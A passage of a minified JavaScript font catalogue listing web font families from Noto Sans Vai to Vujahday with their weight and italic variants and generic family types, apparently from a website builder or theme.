Vai",v:[400],f:"sans-serif"},{n:"Noto Sans Wancho",v:[400],f:"sans-serif"},{n:"Noto Sans Warang Citi",v:[400],f:"sans-serif"},{n:"Noto Sans Yi",v:[400],f:"sans-serif"},{n:"Noto Sans Zanabazar Square",v:[400],f:"sans-serif"},{n:"Noto Serif",v:[400,"400i",700,"700i"],f:"serif"},{n:"Noto Serif Ahom",v:[400],f:"serif"},{n:"Noto Serif Armenian",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Balinese",v:[400],f:"serif"},{n:"Noto Serif Bengali",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Devanagari",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Display",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Noto Serif Dogra",v:[400],f:"serif"},{n:"Noto Serif Ethiopic",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Georgian",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Grantha",v:[400],f:"serif"},{n:"Noto Serif Gujarati",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Gurmukhi",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif JP",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif KR",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Kannada",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Khmer",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Lao",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Malayalam",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Myanmar",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Nyiakeng Puachue Hmong",v:[400,500,600,700],f:"serif"},{n:"Noto Serif SC",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Sinhala",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif TC",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Tamil",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Noto Serif Tangut",v:[400],f:"serif"},{n:"Noto Serif Telugu",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Thai",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Tibetan",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Yezidi",v:[400,500,600,700],f:"serif"},{n:"Noto Traditional Nushu",v:[300,400,500,600,700],f:"sans-serif"},{n:"Nova Cut",v:[400],f:"display"},{n:"Nova Flat",v:[400],f:"display"},{n:"Nova Mono",v:[400],f:"monospace"},{n:"Nova Oval",v:[400],f:"display"},{n:"Nova Round",v:[400],f:"display"},{n:"Nova Script",v:[400],f:"display"},{n:"Nova Slim",v:[400],f:"display"},{n:"Nova Square",v:[400],f:"display"},{n:"Numans",v:[400],f:"sans-serif"},{n:"Nunito",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Nunito Sans",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Nabla",v:[400],f:"display"},{n:"Noto Color Emoji",v:[400],f:"sans-serif"},{n:"Noto Sans Chorasmian",v:[400],f:"sans-serif"},{n:"Noto Sans Ethiopic",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Lao Looped",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Mende Kikakui",v:[400],f:"sans-serif"},{n:"Noto Sans Nag Mundari",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Nandinagari",v:[400],f:"sans-serif"},{n:"Noto Sans SignWriting",v:[400],f:"sans-serif"},{n:"Noto Sans Tangsa",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Serif HK",v:[200,300,400,500,600,700,800,900],f:"serif"},{n:"Noto Serif NP Hmong",v:[400,500,600,700],f:"serif"},{n:"Noto Serif Oriya",v:[400,500,600,700],f:"serif"},{n:"Noto Serif Toto",v:[400,500,600,700],f:"serif"},{n:"Nuosu SIL",v:[400],f:"serif"},{n:"Odibee Sans",v:[400],f:"display"},{n:"Odor Mean Chey",v:[400],f:"serif"},{n:"Offside",v:[400],f:"display"},{n:"Oi",v:[400],f:"display"},{n:"Old Standard TT",v:[400,"400i",700],f:"serif"},{n:"Oldenburg",v:[400],f:"display"},{n:"Ole",v:[400],f:"handwriting"},{n:"Oleo Script",v:[400,700],f:"display"},{n:"Oleo Script Swash Caps",v:[400,700],f:"display"},{n:"Oooh Baby",v:[400],f:"handwriting"},{n:"Open Sans",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Oranienbaum",v:[400],f:"serif"},{n:"Orbitron",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Oregano",v:[400,"400i"],f:"display"},{n:"Orelega One",v:[400],f:"display"},{n:"Orienta",v:[400],f:"sans-serif"},{n:"Original Surfer",v:[400],f:"display"},{n:"Oswald",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Outfit",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Over the Rainbow",v:[400],f:"handwriting"},{n:"Overlock",v:[400,"400i",700,"700i",900,"900i"],f:"display"},{n:"Overlock SC",v:[400],f:"display"},{n:"Overpass",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Overpass Mono",v:["300",400,500,600,700],f:"monospace"},{n:"Ovo",v:[400],f:"serif"},{n:"Oxanium",v:["200","300",400,500,600,700,800],f:"display"},{n:"Oxygen",v:["300",400,700],f:"sans-serif"},{n:"Oxygen Mono",v:[400],f:"monospace"},{n:"PT Mono",v:[400],f:"monospace"},{n:"PT Sans",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"PT Sans Caption",v:[400,700],f:"sans-serif"},{n:"PT Sans Narrow",v:[400,700],f:"sans-serif"},{n:"PT Serif",v:[400,"400i",700,"700i"],f:"serif"},{n:"PT Serif Caption",v:[400,"400i"],f:"serif"},{n:"Pacifico",v:[400],f:"handwriting"},{n:"Padauk",v:[400,700],f:"sans-serif"},{n:"Palanquin",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"Palanquin Dark",v:[400,500,600,700],f:"sans-serif"},{n:"Pangolin",v:[400],f:"handwriting"},{n:"Paprika",v:[400],f:"display"},{n:"Parisienne",v:[400],f:"handwriting"},{n:"Passero One",v:[400],f:"display"},{n:"Passion One",v:[400,700,900],f:"display"},{n:"Passions Conflict",v:[400],f:"handwriting"},{n:"Pathway Gothic One",v:[400],f:"sans-serif"},{n:"Patrick Hand",v:[400],f:"handwriting"},{n:"Patrick Hand SC",v:[400],f:"handwriting"},{n:"Pattaya",v:[400],f:"sans-serif"},{n:"Patua One",v:[400],f:"display"},{n:"Pavanam",v:[400],f:"sans-serif"},{n:"Paytone One",v:[400],f:"sans-serif"},{n:"Peddana",v:[400],f:"serif"},{n:"Peralta",v:[400],f:"display"},{n:"Permanent Marker",v:[400],f:"handwriting"},{n:"Petemoss",v:[400],f:"handwriting"},{n:"Petit Formal Script",v:[400],f:"handwriting"},{n:"Petrona",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Philosopher",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Piazzolla",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Piedra",v:[400],f:"display"},{n:"Pinyon Script",v:[400],f:"handwriting"},{n:"Pirata One",v:[400],f:"display"},{n:"Plaster",v:[400],f:"display"},{n:"Play",v:[400,700],f:"sans-serif"},{n:"Playball",v:[400],f:"display"},{n:"Playfair Display",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Playfair Display SC",v:[400,"400i",700,"700i",900,"900i"],f:"serif"},{n:"Plus Jakarta Sans",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Podkova",v:[400,500,600,700,800],f:"serif"},{n:"Poiret One",v:[400],f:"display"},{n:"Poller One",v:[400],f:"display"},{n:"Poly",v:[400,"400i"],f:"serif"},{n:"Pompiere",v:[400],f:"display"},{n:"Pontano Sans",v:[300,400,500,600,700],f:"sans-serif"},{n:"Poor Story",v:[400],f:"display"},{n:"Poppins",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Port Lligat Sans",v:[400],f:"sans-serif"},{n:"Port Lligat Slab",v:[400],f:"serif"},{n:"Potta One",v:[400],f:"display"},{n:"Pragati Narrow",v:[400,700],f:"sans-serif"},{n:"Praise",v:[400],f:"handwriting"},{n:"Prata",v:[400],f:"serif"},{n:"Preahvihear",v:[400],f:"sans-serif"},{n:"Press Start 2P",v:[400],f:"display"},{n:"Pridi",v:["200","300",400,500,600,700],f:"serif"},{n:"Princess Sofia",v:[400],f:"handwriting"},{n:"Prociono",v:[400],f:"serif"},{n:"Prompt",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Prosto One",v:[400],f:"display"},{n:"Proza Libre",v:[400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Public Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Puppies Play",v:[400],f:"handwriting"},{n:"Puritan",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Purple Purse",v:[400],f:"display"},{n:"Padyakke Expanded One",v:[400],f:"display"},{n:"Pathway Extreme",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Phudu",v:[300,400,500,600,700,800,900],f:"display"},{n:"Playfair",v:[300,400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Poltawski Nowy",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Qahiri",v:[400],f:"sans-serif"},{n:"Quando",v:[400],f:"serif"},{n:"Quantico",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Quattrocento",v:[400,700],f:"serif"},{n:"Quattrocento Sans",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Questrial",v:[400],f:"sans-serif"},{n:"Quicksand",v:["300",400,500,600,700],f:"sans-serif"},{n:"Quintessential",v:[400],f:"handwriting"},{n:"Qwigley",v:[400],f:"handwriting"},{n:"Qwitcher Grypen",v:[400,700],f:"handwriting"},{n:"Racing Sans One",v:[400],f:"display"},{n:"Radio Canada",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Radley",v:[400,"400i"],f:"serif"},{n:"Rajdhani",v:["300",400,500,600,700],f:"sans-serif"},{n:"Rakkas",v:[400],f:"display"},{n:"Raleway",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Raleway Dots",v:[400],f:"display"},{n:"Ramabhadra",v:[400],f:"sans-serif"},{n:"Ramaraja",v:[400],f:"serif"},{n:"Rambla",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Rammetto One",v:[400],f:"display"},{n:"Rampart One",v:[400],f:"display"},{n:"Ranchers",v:[400],f:"display"},{n:"Rancho",v:[400],f:"handwriting"},{n:"Ranga",v:[400,700],f:"display"},{n:"Rasa",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Rationale",v:[400],f:"sans-serif"},{n:"Ravi Prakash",v:[400],f:"display"},{n:"Readex Pro",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Recursive",v:["300",400,500,600,700,800,900],f:"sans-serif"},{n:"Red Hat Display",v:["300",400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Red Hat Mono",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"monospace"},{n:"Red Hat Text",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Red Rose",v:["300",400,500,600,700],f:"display"},{n:"Redacted",v:[400],f:"display"},{n:"Redacted Script",v:["300",400,700],f:"display"},{n:"Redressed",v:[400],f:"handwriting"},{n:"Reem Kufi",v:[400,500,600,700],f:"sans-serif"},{n:"Reenie Beanie",v:[400],f:"handwriting"},{n:"Reggae One",v:[400],f:"display"},{n:"Revalia",v:[400],f:"display"},{n:"Rhodium Libre",v:[400],f:"serif"},{n:"Ribeye",v:[400],f:"display"},{n:"Ribeye Marrow",v:[400],f:"display"},{n:"Righteous",v:[400],f:"display"},{n:"Risque",v:[400],f:"display"},{n:"Road Rage",v:[400],f:"display"},{n:"Roboto",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Roboto Condensed",v:["300","300i",400,"400i",700,"700i"],f:"sans-serif"},{n:"Roboto Flex",v:[400],f:"sans-serif"},{n:"Roboto Mono",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"monospace"},{n:"Roboto Serif",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Roboto Slab",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Rochester",v:[400],f:"handwriting"},{n:"Rock Salt",v:[400],f:"handwriting"},{n:"RocknRoll One",v:[400],f:"sans-serif"},{n:"Rokkitt",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Romanesco",v:[400],f:"handwriting"},{n:"Ropa Sans",v:[400,"400i"],f:"sans-serif"},{n:"Rosario",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Rosarivo",v:[400,"400i"],f:"serif"},{n:"Rouge Script",v:[400],f:"handwriting"},{n:"Rowdies",v:["300",400,700],f:"display"},{n:"Rozha One",v:[400],f:"serif"},{n:"Rubik",v:["300",400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Rubik Beastly",v:[400],f:"display"},{n:"Rubik Bubbles",v:[400],f:"display"},{n:"Rubik Glitch",v:[400],f:"display"},{n:"Rubik Microbe",v:[400],f:"display"},{n:"Rubik Mono One",v:[400],f:"sans-serif"},{n:"Rubik Moonrocks",v:[400],f:"display"},{n:"Rubik Puddles",v:[400],f:"display"},{n:"Rubik Wet Paint",v:[400],f:"display"},{n:"Ruda",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Rufina",v:[400,700],f:"serif"},{n:"Ruge Boogie",v:[400],f:"handwriting"},{n:"Ruluko",v:[400],f:"sans-serif"},{n:"Rum Raisin",v:[400],f:"sans-serif"},{n:"Ruslan Display",v:[400],f:"display"},{n:"Russo One",v:[400],f:"sans-serif"},{n:"Ruthie",v:[400],f:"handwriting"},{n:"Rye",v:[400],f:"display"},{n:"Reem Kufi Fun",v:[400,500,600,700],f:"sans-serif"},{n:"Reem Kufi Ink",v:[400],f:"sans-serif"},{n:"Rubik 80s Fade",v:[400],f:"display"},{n:"Rubik Burned",v:[400],f:"display"},{n:"Rubik Dirt",v:[400],f:"display"},{n:"Rubik Distressed",v:[400],f:"display"},{n:"Rubik Gemstones",v:[400],f:"display"},{n:"Rubik Iso",v:[400],f:"display"},{n:"Rubik Marker Hatch",v:[400],f:"display"},{n:"Rubik Maze",v:[400],f:"display"},{n:"Rubik Pixels",v:[400],f:"display"},{n:"Rubik Spray Paint",v:[400],f:"display"},{n:"Rubik Storm",v:[400],f:"display"},{n:"Rubik Vinyl",v:[400],f:"display"},{n:"STIX Two Text",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Sacramento",v:[400],f:"handwriting"},{n:"Sahitya",v:[400,700],f:"serif"},{n:"Sail",v:[400],f:"display"},{n:"Saira",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Saira Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Extra Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Semi Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Stencil One",v:[400],f:"display"},{n:"Salsa",v:[400],f:"display"},{n:"Sanchez",v:[400,"400i"],f:"serif"},{n:"Sancreek",v:[400],f:"display"},{n:"Sansita",v:[400,"400i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Sansita Swashed",v:["300",400,500,600,700,800,900],f:"display"},{n:"Sarabun",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Sarala",v:[400,700],f:"sans-serif"},{n:"Sarina",v:[400],f:"display"},{n:"Sarpanch",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Sassy Frass",v:[400],f:"handwriting"},{n:"Satisfy",v:[400],f:"handwriting"},{n:"Sawarabi Gothic",v:[400],f:"sans-serif"},{n:"Sawarabi Mincho",v:[400],f:"serif"},{n:"Scada",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Scheherazade New",v:[400,500,600,700],f:"serif"},{n:"Schoolbell",v:[400],f:"handwriting"},{n:"Scope One",v:[400],f:"serif"},{n:"Seaweed Script",v:[400],f:"display"},{n:"Secular One",v:[400],f:"sans-serif"},{n:"Sedgwick Ave",v:[400],f:"handwriting"},{n:"Sedgwick Ave Display",v:[400],f:"handwriting"},{n:"Sen",v:[400,700,800],f:"sans-serif"},{n:"Send Flowers",v:[400],f:"handwriting"},{n:"Sevillana",v:[400],f:"display"},{n:"Seymour One",v:[400],f:"sans-serif"},{n:"Shadows Into Light",v:[400],f:"handwriting"},{n:"Shadows Into Light Two",v:[400],f:"handwriting"},{n:"Shalimar",v:[400],f:"handwriting"},{n:"Shanti",v:[400],f:"sans-serif"},{n:"Share",v:[400,"400i",700,"700i"],f:"display"},{n:"Share Tech",v:[400],f:"sans-serif"},{n:"Share Tech Mono",v:[400],f:"monospace"},{n:"Shippori Antique",v:[400],f:"sans-serif"},{n:"Shippori Antique B1",v:[400],f:"sans-serif"},{n:"Shippori Mincho",v:[400,500,600,700,800],f:"serif"},{n:"Shippori Mincho B1",v:[400,500,600,700,800],f:"serif"},{n:"Shojumaru",v:[400],f:"display"},{n:"Short Stack",v:[400],f:"handwriting"},{n:"Shrikhand",v:[400],f:"display"},{n:"Siemreap",v:[400],f:"display"},{n:"Sigmar One",v:[400],f:"display"},{n:"Signika",v:["300",400,500,600,700],f:"sans-serif"},{n:"Signika Negative",v:["300",400,500,600,700],f:"sans-serif"},{n:"Simonetta",v:[400,"400i",900,"900i"],f:"display"},{n:"Single Day",v:[400],f:"display"},{n:"Sintony",v:[400,700],f:"sans-serif"},{n:"Sirin Stencil",v:[400],f:"display"},{n:"Six Caps",v:[400],f:"sans-serif"},{n:"Skranji",v:[400,700],f:"display"},{n:"Slabo 13px",v:[400],f:"serif"},{n:"Slabo 27px",v:[400],f:"serif"},{n:"Slackey",v:[400],f:"display"},{n:"Smokum",v:[400],f:"display"},{n:"Smooch",v:[400],f:"handwriting"},{n:"Smooch Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Smythe",v:[400],f:"display"},{n:"Sniglet",v:[400,800],f:"display"},{n:"Snippet",v:[400],f:"sans-serif"},{n:"Snowburst One",v:[400],f:"display"},{n:"Sofadi One",v:[400],f:"display"},{n:"Sofia",v:[400],f:"handwriting"},{n:"Solway",v:["300",400,500,700,800],f:"serif"},{n:"Song Myung",v:[400],f:"serif"},{n:"Sonsie One",v:[400],f:"display"},{n:"Sora",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Sorts Mill Goudy",v:[400,"400i"],f:"serif"},{n:"Source Code Pro",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Source Sans 3",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Source Sans Pro",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Source Serif 4",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Source Serif Pro",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900,"900i"],f:"serif"},{n:"Space Grotesk",v:["300",400,500,600,700],f:"sans-serif"},{n:"Space Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Special Elite",v:[400],f:"display"},{n:"Spectral",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"serif"},{n:"Spectral SC",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"serif"},{n:"Spicy Rice",v:[400],f:"display"},{n:"Spinnaker",v:[400],f:"sans-serif"},{n:"Spirax",v:[400],f:"display"},{n:"Spline Sans",v:["300",400,500,600,700],f:"sans-serif"},{n:"Squada One",v:[400],f:"display"},{n:"Square Peg",v:[400],f:"handwriting"},{n:"Sree Krushnadevaraya",v:[400],f:"serif"},{n:"Sriracha",v:[400],f:"handwriting"},{n:"Srisakdi",v:[400,700],f:"display"},{n:"Staatliches",v:[400],f:"display"},{n:"Stalemate",v:[400],f:"handwriting"},{n:"Stalinist One",v:[400],f:"display"},{n:"Stardos Stencil",v:[400,700],f:"display"},{n:"Stick",v:[400],f:"sans-serif"},{n:"Stick No Bills",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Stint Ultra Condensed",v:[400],f:"display"},{n:"Stint Ultra Expanded",v:[400],f:"display"},{n:"Stoke",v:["300",400],f:"serif"},{n:"Strait",v:[400],f:"sans-serif"},{n:"Style Script",v:[400],f:"handwriting"},{n:"Stylish",v:[400],f:"sans-serif"},{n:"Sue Ellen Francisco",v:[400],f:"handwriting"},{n:"Suez One",v:[400],f:"serif"},{n:"Sulphur Point",v:["300",400,700],f:"sans-serif"},{n:"Sumana",v:[400,700],f:"serif"},{n:"Sunflower",v:["300",500,700],f:"sans-serif"},{n:"Sunshiney",v:[400],f:"handwriting"},{n:"Supermercado One",v:[400],f:"display"},{n:"Sura",v:[400,700],f:"serif"},{n:"Suranna",v:[400],f:"serif"},{n:"Suravaram",v:[400],f:"serif"},{n:"Suwannaphum",v:["100","300",400,700,900],f:"serif"},{n:"Swanky and Moo Moo",v:[400],f:"handwriting"},{n:"Syncopate",v:[400,700],f:"sans-serif"},{n:"Syne",v:[400,500,600,700,800],f:"sans-serif"},{n:"Syne Mono",v:[400],f:"monospace"},{n:"Syne Tactile",v:[400],f:"display"},{n:"Schibsted Grotesk",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Shantell Sans",v:[300,400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"display"},{n:"Sigmar",v:[400],f:"display"},{n:"Silkscreen",v:[400,700],f:"display"},{n:"Slackside One",v:[400],f:"handwriting"},{n:"Sofia Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Extra Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Semi Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Solitreo",v:[400],f:"handwriting"},{n:"Sono",v:[200,300,400,500,600,700,800],f:"sans-serif"},{n:"Splash",v:[400],f:"handwriting"},{n:"Spline Sans Mono",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"monospace"},{n:"Tajawal",v:["200","300",400,500,700,800,900],f:"sans-serif"},{n:"Tangerine",v:[400,700],f:"handwriting"},{n:"Tapestry",v:[400],f:"handwriting"},{n:"Taprom",v:[400],f:"display"},{n:"Tauri",v:[400],f:"sans-serif"},{n:"Taviraj",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Teko",v:["300",400,500,600,700],f:"sans-serif"},{n:"Telex",v:[400],f:"sans-serif"},{n:"Tenali Ramakrishna",v:[400],f:"sans-serif"},{n:"Tenor Sans",v:[400],f:"sans-serif"},{n:"Text Me One",v:[400],f:"sans-serif"},{n:"Texturina",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Thasadith",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"The Girl Next Door",v:[400],f:"handwriting"},{n:"The Nautigal",v:[400,700],f:"handwriting"},{n:"Tienne",v:[400,700,900],f:"serif"},{n:"Tillana",v:[400,500,600,700,800],f:"handwriting"},{n:"Timmana",v:[400],f:"sans-serif"},{n:"Tinos",v:[400,"400i",700,"700i"],f:"serif"},{n:"Titan One",v:[400],f:"display"},{n:"Titillium Web",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900],f:"sans-serif"},{n:"Tomorrow",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Tourney",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Trade Winds",v:[400],f:"display"},{n:"Train One",v:[400],f:"display"},{n:"Trirong",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Trispace",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Trocchi",v:[400],f:"serif"},{n:"Trochut",v:[400,"400i",700],f:"display"},{n:"Truculenta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Trykker",v:[400],f:"serif"},{n:"Tulpen One",v:[400],f:"display"},{n:"Turret Road",v:["200","300",400,500,700,800],f:"display"},{n:"Twinkle Star",v:[400],f:"handwriting"},{n:"Tai Heritage Pro",v:[400,700],f:"serif"},{n:"Tilt Neon",v:[400],f:"display"},{n:"Tilt Prism",v:[400],f:"display"},{n:"Tilt Warp",v:[400],f:"display"},{n:"Tiro Bangla",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Hindi",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Marathi",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Sanskrit",v:[400,"400i"],f:"serif"},{n:"Tiro Gurmukhi",v:[400,"400i"],f:"serif"},{n:"Tiro Kannada",v:[400,"400i"],f:"serif"},{n:"Tiro Tamil",v:[400,"400i"],f:"serif"},{n:"Tiro Telugu",v:[400,"400i"],f:"serif"},{n:"Tsukimi Rounded",v:[300,400,500,600,700],f:"sans-serif"},{n:"Ubuntu",v:["300","300i",400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"Ubuntu Condensed",v:[400],f:"sans-serif"},{n:"Ubuntu Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Uchen",v:[400],f:"serif"},{n:"Ultra",v:[400],f:"serif"},{n:"Uncial Antiqua",v:[400],f:"display"},{n:"Underdog",v:[400],f:"display"},{n:"Unica One",v:[400],f:"display"},{n:"UnifrakturCook",v:[700],f:"display"},{n:"UnifrakturMaguntia",v:[400],f:"display"},{n:"Unkempt",v:[400,700],f:"display"},{n:"Unlock",v:[400],f:"display"},{n:"Unna",v:[400,"400i",700,"700i"],f:"serif"},{n:"Updock",v:[400],f:"handwriting"},{n:"Urbanist",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Unbounded",v:[200,300,400,500,600,700,800,900],f:"display"},{n:"VT323",v:[400],f:"monospace"},{n:"Vampiro One",v:[400],f:"display"},{n:"Varela",v:[400],f:"sans-serif"},{n:"Varela Round",v:[400],f:"sans-serif"},{n:"Varta",v:["300",400,500,600,700],f:"sans-serif"},{n:"Vast Shadow",v:[400],f:"display"},{n:"Vazirmatn",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Vesper Libre",v:[400,500,700,900],f:"serif"},{n:"Viaoda Libre",v:[400],f:"display"},{n:"Vibes",v:[400],f:"display"},{n:"Vibur",v:[400],f:"handwriting"},{n:"Vidaloka",v:[400],f:"serif"},{n:"Viga",v:[400],f:"sans-serif"},{n:"Voces",v:[400],f:"display"},{n:"Volkhov",v:[400,"400i",700,"700i"],f:"serif"},{n:"Vollkorn",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Vollkorn SC",v:[400,600,700,900],f:"serif"},{n:"Voltaire",v:[400],f:"sans-serif"},{n:"Vujahday 